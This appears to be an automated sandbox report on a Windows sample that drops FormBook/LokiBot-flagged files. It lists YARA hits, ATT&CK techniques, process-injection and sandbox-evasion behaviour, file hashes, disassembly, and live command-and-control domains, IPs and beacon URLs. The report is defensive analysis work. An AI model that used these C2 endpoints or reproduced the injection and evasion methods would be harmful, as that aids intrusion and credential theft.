            Source: explorer.exe, 00000003.00000000.324252359.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.260934888.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CProgmanile
            Source: explorer.exe, 00000003.00000000.261279004.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.298664617.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.324590825.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: GetLocaleInfoW,GetNumberFormatW,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C7F654 cpuid
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C7DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,
            Source: C:\Users\user\Desktop\primosdv3.1.1.0.exeCode function: 0_2_00C6B146 GetVersionExW,

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 2.2.bstkiooen.exe.400000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.bstkiooen.exe.1010000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.bstkiooen.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.bstkiooen.exe.1010000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.bstkiooen.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.367591783.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.380585680.0000000001010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.367627039.0000000001010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.367277832.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.512934564.0000000002C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000000.256016836.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.513556631.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000000.314463176.000000001035B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.512242652.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000000.254923934.0000000000401000.00000020.00000001.01000000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\F61A.tmp, type: DROPPED
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts2
            Command and Scripting Interpreter
            11
            DLL Side-Loading
            512
            Process Injection
            1
            Rootkit
            1
            Credential API Hooking
            1
            System Time Discovery
            Remote Services1
            Credential API Hooking
            Exfiltration Over Other Network Medium1
            Encrypted Channel
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default Accounts1
            Shared Modules
            Boot or Logon Initialization Scripts11
            DLL Side-Loading
            1
            Virtualization/Sandbox Evasion
            1
            Input Capture
            241
            Security Software Discovery
            Remote Desktop Protocol1
            Input Capture
            Exfiltration Over Bluetooth3
            Ingress Tool Transfer
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)512
            Process Injection
            Security Account Manager1
            Virtualization/Sandbox Evasion
            SMB/Windows Admin Shares1
            Archive Collected Data
            Automated Exfiltration3
            Non-Application Layer Protocol
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
            Deobfuscate/Decode Files or Information
            NTDS2
            Process Discovery
            Distributed Component Object ModelInput CaptureScheduled Transfer13
            Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script4
            Obfuscated Files or Information
            LSA Secrets1
            Remote System Discovery
            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common4
            Software Packing
            Cached Domain Credentials2
            File and Directory Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items11
            DLL Side-Loading
            DCSync124
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 715075 Sample: primosdv3.1.1.0.exe Startdate: 03/10/2022 Architecture: WINDOWS Score: 100 46 Snort IDS alert for network traffic 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Antivirus detection for dropped file 2->50 52 4 other signatures 2->52 10 primosdv3.1.1.0.exe 10 2->10         started        process3 file4 30 C:\Users\user\AppData\Local\...\bstkiooen.exe, PE32 10->30 dropped 13 bstkiooen.exe 1 10->13         started        process5 file6 32 C:\Users\user\AppData\Local\Temp\F61A.tmp, PE32 13->32 dropped 62 Multi AV Scanner detection for dropped file 13->62 64 Machine Learning detection for dropped file 13->64 66 Found hidden mapped module (file has been removed from disk) 13->66 68 Tries to detect virtualization through RDTSC time measurements 13->68 17 bstkiooen.exe 13->17         started        signatures7 process8 signatures9 38 Modifies the context of a thread in another process (thread injection) 17->38 40 Maps a DLL or memory area into another process 17->40 42 Sample uses process hollowing technique 17->42 44 Queues an APC in another process (thread injection) 17->44 20 svchost.exe 17->20         started        23 explorer.exe 17->23 injected process10 dnsIp11 54 Modifies the context of a thread in another process (thread injection) 20->54 56 Maps a DLL or memory area into another process 20->56 58 Tries to detect virtualization through RDTSC time measurements 20->58 26 cmd.exe 1 20->26         started        34 www.sandstormcase.us 103.224.212.221, 49708, 80 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 23->34 36 www.nordenergogrup.store 5.101.152.161, 49707, 80 BEGET-ASRU Russian Federation 23->36 60 System process connects to network (likely due to code injection or exploit) 23->60 signatures12 process13 process14 28 conhost.exe 26->28         started       

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            primosdv3.1.1.0.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\F61A.tmp100%AviraTR/Crypt.ZPACK.Gen
            C:\Users\user\AppData\Local\Temp\F61A.tmp100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\bstkiooen.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\bstkiooen.exe24%ReversingLabsWin32.Trojan.LokiBot
            SourceDetectionScannerLabelLinkDownload
            1.2.bstkiooen.exe.1010000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            13.2.svchost.exe.3a2f840.4.unpack100%AviraTR/ATRAPS.Gen5Download File
            2.2.bstkiooen.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            2.0.bstkiooen.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            2.0.bstkiooen.exe.400000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            13.2.svchost.exe.60d900.1.unpack100%AviraTR/Patched.Ren.GenDownload File
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://ww38.sandstormcase.us/sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9m0%Avira URL Cloudsafe
            www.nordenergogrup.store/sk29/0%Avira URL Cloudsafe
            http://www.sandstormcase.us/sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msKV993IDUg&j8Ot3=AVtD0%Avira URL Cloudsafe
            http://www.nordenergogrup.store/sk29/?f2Jdmp=/dAaGq0HlK8GRVwC0eZiOsNSw3Abl/LxCMSzQhtOo+vkboQqmAD6TQGCAVscPIh/3NW5&j8Ot3=AVtD0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            www.sandstormcase.us
            103.224.212.221
            truetrue
              unknown
              www.nordenergogrup.store
              5.101.152.161
              truetrue
                unknown
                NameMaliciousAntivirus DetectionReputation
                www.nordenergogrup.store/sk29/true
                • Avira URL Cloud: safe
                low
                http://www.nordenergogrup.store/sk29/?f2Jdmp=/dAaGq0HlK8GRVwC0eZiOsNSw3Abl/LxCMSzQhtOo+vkboQqmAD6TQGCAVscPIh/3NW5&j8Ot3=AVtDtrue
                • Avira URL Cloud: safe
                unknown
                http://www.sandstormcase.us/sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msKV993IDUg&j8Ot3=AVtDtrue
                • Avira URL Cloud: safe
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000003.00000000.335934936.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.310782659.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.276212440.000000000F276000.00000004.00000001.00020000.00000000.sdmpfalse
                  high
                  http://ww38.sandstormcase.us/sk29/?f2Jdmp=M3Z0NOd5fAliwCg3EZwT2t6453H5ahVdrEePvIndisgPyIDGbv67zsai9msvchost.exe, 0000000D.00000002.517398218.0000000003F1F000.00000004.10000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  103.224.212.221
                  www.sandstormcase.usAustralia
                  133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                  5.101.152.161
                  www.nordenergogrup.storeRussian Federation
                  198610BEGET-ASRUtrue
                  Joe Sandbox Version:36.0.0 Rainbow Opal
                  Analysis ID:715075
                  Start date and time:2022-10-03 15:57:46 +02:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 9m 15s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:primosdv3.1.1.0.exe
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of analysed new started processes analysed:17
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@10/4@2/2
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 84.8% (good quality ratio 80.4%)
                  • Quality average: 75.3%
                  • Quality standard deviation: 29%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocsp.digicert.com, ctldl.windowsupdate.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  No simulations
                  No context
                  No context
                  No context
                  No context
                  No context
                  Process:C:\Users\user\AppData\Local\Temp\bstkiooen.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):189440
                  Entropy (8bit):7.323091547368136
                  Encrypted:false
                  SSDEEP:3072:iAWRgxkQBqhbtf3fHdM4/WOaK17VhuuJuIhxlmbelWufH5Z4:HCff9M4+OaK17zTdlmi9H5Z4
                  MD5:76EA697ED6A45562B791C6DE86E32587
                  SHA1:86386F7A910A1589E2BB13E40E406DA7D0E8EB04
                  SHA-256:336D76467E148CAF61A2F4755B72A2197A61DE80576A315DA678F45EF381C635
                  SHA-512:4F280A3F595D8B73CDC2BA6B877E2F86296CC57FE4047C322E0E555540FB644CC57DCE69E7204A3199873035603A63D41579FB007D3DDA688B7257E90D8EBC80
                  Malicious:true
                  Yara Hits:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, Author: unknown
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: C:\Users\user\AppData\Local\Temp\F61A.tmp, Author: JPCERT/CC Incident Response Group
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  Reputation:low
                  Preview:MZER.....X......<......(..............................................!..L.!This program cannot be run in DOS mode....$............f..f..f......f......f......f.Rich.f.................PE..L....X.?..........................................@.......................................@..........................................................................................................................................................text...4........................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\primosdv3.1.1.0.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):6144
                  Entropy (8bit):3.633221484430513
                  Encrypted:false
                  SSDEEP:48:qvVeshJ8x6Q8jNHdhIsnpPnPihJQSsnpVGJZvq0xpXtJZuNOBSvivc7odlM7BXWM:+j84jhdhIKeKU1xtPunqkcK7B2yh
                  MD5:A2AF309781DF2F75DC0B57AE63B0F3A9
                  SHA1:F4137068334E1856471F4701C96AFAA0470C7D4C
                  SHA-256:328F2A0D53ED5C36513F278F32A0D6166A2DC0993ED4F52185198D6200595E1C
                  SHA-512:5F7BD4C508E1F9F0B391EBC6B42F6F734B846A76D6903DB3E75B7B671D02BEF2BAECB40BCBB37A41394AECCB8D2591C2F5492AA74E458FF814B184D9668F259B
                  Malicious:true
                  Antivirus:
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 24%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........xh....D...D...D.r.E...D...D...D{b.E...D{b.D...D{b.E...DRich...D................PE..L.....:c...............!..................... ....@..........................`............@..................................!.......@..0....................P..`.... ............................................... ...............................text...G........................... ..`.rdata..>.... ......................@..@.data...:....0......................@....rsrc...0....@......................@..@.reloc..`....P......................@..B........................................................................................................................................................................................................................................................................................................................................................
                  Process:C:\Users\user\Desktop\primosdv3.1.1.0.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):189440
                  Entropy (8bit):7.991176325141183
                  Encrypted:true
                  SSDEEP:3072:qMpf+ZMhpLYinMDJAaSh5xdYLLTyk6aOaRuFZq5W48u+lcOvK4OUK3aO85/V2CRT:RRcMHLHn4JAxdY3mOvCu+lcft33aO6/F
                  MD5:B02C99ECFDB7D8793254BC8E9C003869
                  SHA1:E38CA7FF9C88E36D19AA0198820B97F6A11DE201
                  SHA-256:2F8EB57267950A4BC6E8DD8B2D7DEF8AFC40B8DB3C5EF49ADC68FB144F7E8E41
                  SHA-512:D12CD9FBABDCC1A5C601D6C0326B34F65FFC63BE84CA94BC6DC70F0E70EC7C3B46122136D6F2A7E82BCB3E27D4BB89D9332DDD35026873FD4029D3405F73B09B
                  Malicious:false
                  Reputation:low
                  Preview:....+J...j....|(.0.u..J..R....).5........jz._3.UE.-Y............|....r.7. ..FF{.......Q.?I~\.i=..b-,.G.=..q...dQc.0/.._..W...v}.b....'`.4t.. x...y......h.m'@.{..C`........E....H.%u.a`...2.......[...V.....q..<........N..5..r....l.2....L...s...Dg+J....3. ...RF0}R.....%=...).0....z...jz._3..E.-Y........../...'..y(...P4.2rgR...W.t[.C6W.L.xJx.....4.,J.~t..0/.._...m$.SoDS.....J.b......\.&L.r.9.....w=.n:h)y.-...........H.%..<`p..2.4h<....[....V.BAE'q..Q........Cy.5..r..,.l......L...s>..Dg+J....3. ...U>0}q.....%M...).5........jz._3.UE.-Y........../...'..y(...P4.2rgR...W.t[.C6W.L.xJx.....4.,J.~t..0/.._...m$.SoDS.....J.b......\.&L.r.9.....w=.n:h)y.-.......E....H.%.Ba`p..2.).<....[....V.BAE'q..Q........Cy.5..r..,.l......L...s>..Dg+J....3. ...U>0}q.....%M...).5........jz._3.UE.-Y........../...'..y(...P4.2rgR...W.t[.C6W.L.xJx.....4.,J.~t..0/.._...m$.SoDS.....J.b......\.&L.r.9.....w=.n:h)y.-.......E....H.%.Ba`p..2.).<....[....V.BAE'q..Q........
                  Process:C:\Users\user\Desktop\primosdv3.1.1.0.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):4666
                  Entropy (8bit):7.949680139202999
                  Encrypted:false
                  SSDEEP:96:EH5p6GkNpLZr6WP1zzXHvtORRyr5lau1y0OBifC8Ll0q6Nrj:EyZPhPV7HGyTf1ypUVSj
                  MD5:73D355A9E88D7A82F69E612949EB4965
                  SHA1:B6041F58669A65E43FBE8DCBA0DBD061E48812BC
                  SHA-256:115814A83166723CE7080D92AF30822DBD7DC2D5D26EDEC9145B056B7226E166
                  SHA-512:5498AD05A858051705E6E37A884F8897623BB2A415515C951E76D1EF12554994A6DE0CD17B045DD740D9D92055BA1B6A725129F36740261D9DE9EE9BB29577AF
                  Malicious:false
                  Reputation:low
                  Preview:.S.M...#>.t.vY.._.Tn.6T.x=g.7..^...@E....D...vF!..il.(.,.U.P....uZ..zj.e4.H......|.....B,...F....P......%..r"`..........^9.h.1..O..}.D.._.....{,.#.;G[..."aZ5..M.p.<..E.......>..7|...%.....s.U.L.=.5........{...c`.Yp..p.^U...x....?..^.R..>.........,...%1w.|8...3...#.....@..:...Z"..M;.24...:...v...J...../....VM.E..@G...@...(E5.(..6`.C|.8=.*g......N.Y..l.....yp...d..Mu.$83...;.-$B....u...nF....s..R.j.>\.54.O..C.e...$...x..32.~.@.Kh....X;.iC...#.M..J....M....n1.....?..^..`..M.dZ.!.;..l..Y.L.aWu.tX..#.....tEr.k.hA....5....wm ...]".e...]....).....=......C..6.r....5."..1.A.B....h\.I#h....N*...aJQ#.).wh...~.3s0O...o.W...\....2....E../.Z.e,.Q......&r.!eW...B..X...Tqgu......M.Fy.%##.-OT...iM.l..y..._4..%f.8.a......G14N..=.,;.I.w.......x.m.^J.*..[C...D`.[...0.]l[:.......".1aS...{~f.a..cqW..&..liY...qSF0 ..o.T.......b.......F../E..e.).&.ffA.0.ZPP. M..hr.oG..;3^.[.]r...J.....7o.....=.......n....q].....a.vy...a.1K.[.5y..d;...K:...[n..
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.134737003085009
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:primosdv3.1.1.0.exe
                  File size:577991
                  MD5:633bb3ab12d6fd7b6956aa3a93f55e9c
                  SHA1:f4a72da6391fcc9c623ae26de27fc80f10cf9f2b
                  SHA256:0b504e6f2a283de75673bbe913c5032b02cc6a92888f4dfab895f79104b11103
                  SHA512:ebdfa42be8d8f1a64900ba48748c8f86d9b74defbf85b3dda94d1df4d7c695d81769e165252fc0cfb2b5ffe347d84eb2f4f74e8d3e3d3ed3fa6466426f4eec28
                  SSDEEP:12288:zToPWBv/cpGrU3yJYqi+4mMz4pbIQ4+N54CHLottc:zTbBv5rUGdf4m/pMQ4m5nrJ
                  TLSH:01C4DF037ACF81B1D2B1283A793592135939BE100FA089CBA7A4579DF9706D3D635FB2
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                  Icon Hash:64e8acaca2d45869
                  Entrypoint:0x41f530
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:12e12319f1029ec4f8fcbed7e82df162
                  Instruction
                  call 00007FD184D0064Bh
                  jmp 00007FD184CFFF5Dh
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  push ebp
                  mov ebp, esp
                  push esi
                  push dword ptr [ebp+08h]
                  mov esi, ecx
                  call 00007FD184CF2DA7h
                  mov dword ptr [esi], 004356D0h
                  mov eax, esi
                  pop esi
                  pop ebp
                  retn 0004h
                  and dword ptr [ecx+04h], 00000000h
                  mov eax, ecx
                  and dword ptr [ecx+08h], 00000000h
                  mov dword ptr [ecx+04h], 004356D8h
                  mov dword ptr [ecx], 004356D0h
                  ret
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  push ebp
                  mov ebp, esp
                  push esi
                  mov esi, ecx
                  lea eax, dword ptr [esi+04h]
                  mov dword ptr [esi], 004356B8h
                  push eax
                  call 00007FD184D033EFh
                  test byte ptr [ebp+08h], 00000001h
                  pop ecx
                  je 00007FD184D000ECh
                  push 0000000Ch
                  push esi
                  call 00007FD184CFF6A9h
                  pop ecx
                  pop ecx
                  mov eax, esi
                  pop esi
                  pop ebp
                  retn 0004h
                  push ebp
                  mov ebp, esp
                  sub esp, 0Ch
                  lea ecx, dword ptr [ebp-0Ch]
                  call 00007FD184CF2D22h
                  push 0043BEF0h
                  lea eax, dword ptr [ebp-0Ch]
                  push eax
                  call 00007FD184D02EA9h
                  int3
                  push ebp
                  mov ebp, esp
                  sub esp, 0Ch
                  lea ecx, dword ptr [ebp-0Ch]
                  call 00007FD184D00068h
                  push 0043C0F4h
                  lea eax, dword ptr [ebp-0Ch]
                  push eax
                  call 00007FD184D02E8Ch
                  int3
                  jmp 00007FD184D04927h
                  int3
                  int3
                  int3
                  int3
                  push 00422900h
                  push dword ptr fs:[00000000h]
                  Programming Language:
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x1f293.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x840000x233c.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x31bdc0x31c00False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0x330000xaec00xb000False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0x3e0000x247200x1000False0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .didat0x630000x1900x200False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x640000x1f2930x1f400False0.424109375data5.5156403191348256IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x840000x233c0x2400False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountry
                  PNG0x645e40xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States
                  PNG0x6512c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States
                  RT_ICON0x666d80x6556PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                  RT_ICON0x6cc300x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States
                  RT_ICON0x7d4580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                  RT_ICON0x7fa000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                  RT_ICON0x80aa80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                  RT_DIALOG0x80f100x286dataEnglishUnited States
                  RT_DIALOG0x811980x13adataEnglishUnited States
                  RT_DIALOG0x812d40xecdataEnglishUnited States
                  RT_DIALOG0x813c00x12edataEnglishUnited States
                  RT_DIALOG0x814f00x338dataEnglishUnited States
                  RT_DIALOG0x818280x252dataEnglishUnited States
                  RT_STRING0x81a7c0x1e2dataEnglishUnited States
                  RT_STRING0x81c600x1ccdataEnglishUnited States
                  RT_STRING0x81e2c0x1b8dataEnglishUnited States
